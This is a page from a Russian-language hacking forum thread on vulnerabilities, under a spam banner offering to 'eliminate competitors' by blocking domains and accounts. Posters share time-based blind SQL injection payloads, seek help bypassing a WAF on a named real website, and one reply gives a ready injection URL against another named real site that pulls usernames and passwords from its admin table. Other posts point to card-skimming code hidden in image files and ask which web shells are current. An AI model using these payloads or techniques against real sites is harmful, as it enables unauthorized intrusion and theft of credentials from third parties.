УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 285 из 296

285

Опции темы

Поиск в этой теме

Опции просмотра

#2841

29.06.2020, 14:38

testvalue

Guest

Сообщений: n/a

Провел на форуме:
1238

Репутация: 0

Привет.

Подскажите, плиз.

Как правильно видоизменить нагрузку вида

Код:

Code:
'OR(if(now()=sysdate(),sleep(3),0))OR'*/

для того чтобы начать перебирать символы, например, чтобы получить значение

Код:

Code:
version()

базы данных.

Не хватает понимания

По идее так

Код:

Code:
'OR(if(substring(version((),1,1)='m',sleep(3),0))OR'*/

, да?

Cпасибо.

#2842

29.06.2020, 14:54

fandor9

Guest

Сообщений: n/a

Провел на форуме:
169390

Репутация: 47

Цитата:

Сообщение от testvalue

testvalue said:
↑
Привет.
Подскажите, плиз.
Как правильно видоизменить нагрузку вида

Код:

Code:
'OR(if(now()=sysdate(),sleep(3),0))OR'*/

для того чтобы начать перебирать символы, например, чтобы получить значение

Код:

Code:
version()

базы данных.
Не хватает понимания
Cпасибо.

Что-бы узнать имеет-ли 2-ой символ значение 'A':

Код:

Code:
'OR(if(substring(version(),2,1)='А'),sleep(3),0))OR'*/

ещё лучше перебирать по ASCII (53='5') т.е. является ли 2ой символ цифрой 5:

Код:

Code:
'OR(if(ASCII(SUBSTR(VERSION(),2,1))=53),sleep(3),0))OR'*/

#2843

29.06.2020, 15:01

testvalue

Guest

Сообщений: n/a

Провел на форуме:
1238

Репутация: 0

Спасибо большое, дружище, сейчас пойду пробовать

#2844

30.06.2020, 17:39

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

Цитата:

Сообщение от crlf

crlf said:
↑
Оригинал:
https://blog.malwarebytes.com/threat...es-as-favicon/
Cервер отдавал JS только при "правильных" реферах, иначе выплёвывалась картинка. Браузер не подгружает левые майм типы для скриптов (script src) и ошибок никаких не возникает. А сделан сей трик, по всей видимости, для затруднения детекта автоматическими сканерами и анализаторами безопасности.
Статья немного вводит в заблуждение

Оказалось немного иначе, но смысл как раз в затруднении детекта.

Подробный разбор:

https://blog.malwarebytes.com/threa...ata-exfiltrates-credit-cards-via-image-files/

Опус от автора техники:

https://xss.is/threads/39071/

#2845

09.07.2020, 20:58

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Какие шеллы сейчас актуальны?

#2846

09.07.2020, 21:46

testvalue

Guest

Сообщений: n/a

Провел на форуме:
1238

Репутация: 0

Привет.

Помогите докрутить скулю и обойти WAF.

https://www.hbo.ro/TitleDetail.aspx?ScheduleId='OR(if(now()=sysdate() ,sleep(5),0))OR'xxx -> True, задержка 5 секунд

На sleep() реагирует, и видно, что там есть скуля, но при попытке извлечь например, version() или user() cудя по всему срабатывает WAF.

Пытался через вектор 'OR(if(ASCII(SUBSTR(VERSION(),1,1))=53),sleep(3),0 ))OR', но облом.

Спасибо.

#2847

23.07.2020, 21:01

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Отправить сообщение для DezMond™ с помощью ICQ

Помогите раскрутить, все идёт с запроса в LIKE

Код:

Code:
https://www.wbt.de/no_cache/english/contact/europe/austria.html?rmhaendlerinfo[show]=search&no_cache=1&rmhaendlerinfo[word]=sa%22

#2848

23.07.2020, 23:38

neur0funk

Guest

Сообщений: n/a

Провел на форуме:
5363

Репутация: 12

Цитата:

Сообщение от DezMond™

DezMond™ said:
↑
Помогите раскрутить, все идёт с запроса в LIKE

Код:

Code:
https://www.wbt.de/no_cache/english/contact/europe/austria.html?rmhaendlerinfo[show]=search&no_cache=1&rmhaendlerinfo[word]=sa%22

Код:

Code:
https://www.wbt.de/no_cache/english/contact/europe/austria.html?rmhaendlerinfo[show]=search&no_cache=1&rmhaendlerinfo[word]=sa%22/**/or/**/(extractvalue(0x0a,concat(0x0a,(select(group_concat(concat_ws(0x3a,username,password)))from(be_users)))))=%22

#2849

25.07.2020, 21:39

FireRidlle

Новичок

Регистрация: 07.07.2009

Сообщений: 2

Провел на форуме:
16896

Репутация: 0

здравствуйте. вопрос по валидации числовых параметров. есть параметр page. если передать 1' то возвращает первую страницу, 1" так же, 2-1 то вторую страницу. -1 ошибка. можно что что сделать?

#2850

25.07.2020, 23:40

FireRidlle

Новичок

Регистрация: 07.07.2009

Сообщений: 2

Провел на форуме:
16896

Репутация: 0

Цитата:

Сообщение от fandor9

fandor9 said:
↑
'OR(if(ASCII(SUBSTR(VERSION(),2,1))=53),sleep(3),0 ))OR'*/

еще можно не сравнением а бинарным поиском через >= к примеру если хочешь знаешь что только цифры

Код:

Code:
'OR(if(ASCII(SUBSTR(VERSION(),2,1))>=53),sleep(3),0))OR'*

сработало, то берем среднее число из диапазона между 53 и 57, к примеру >=55. не сработало значит чекаешь 53,54. если сработало то 55,56,57. очень ускоряет когда нужно искать цифры и буквы в разном регистре